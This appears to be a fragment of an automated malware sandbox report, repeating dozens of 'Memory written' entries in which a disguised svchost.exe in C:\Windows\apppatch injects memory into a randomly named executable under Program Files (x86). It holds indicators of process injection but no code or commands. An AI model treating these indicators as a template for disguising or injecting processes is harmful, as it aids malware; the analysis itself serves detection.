Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E70000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E71000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E72000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: EC2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E80000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E81000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E82000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: ED2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1040000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1041000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1042000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1092000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E40000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E41000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E42000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2530000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2531000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2532000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2582000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 840000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 841000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 842000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 892000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1220000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1221000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1222000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1272000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: AA0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: AA1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: AA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: AF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 11F0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 11F1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 11F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1242000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1300000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1301000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1302000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1352000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F10000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 810000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 811000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 812000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 862000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1300000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1301000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1302000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1352000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 850000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 851000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 852000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 8A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1010000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1011000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1012000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1062000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F10000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E10000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: DA0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: DA1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: DA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: DF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: BE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: BE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: BE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: C32000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1480000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1481000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1482000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 14D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F10000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1010000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1011000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1012000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1062000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1300000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1301000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1302000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1352000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1500000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1501000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1502000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1552000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 13D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 13D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 13D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1422000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 8C0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 8C1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 8C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 912000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: D10000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: D11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: D12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: D62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 10F0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 10F1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 10F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1142000Jump to behavior
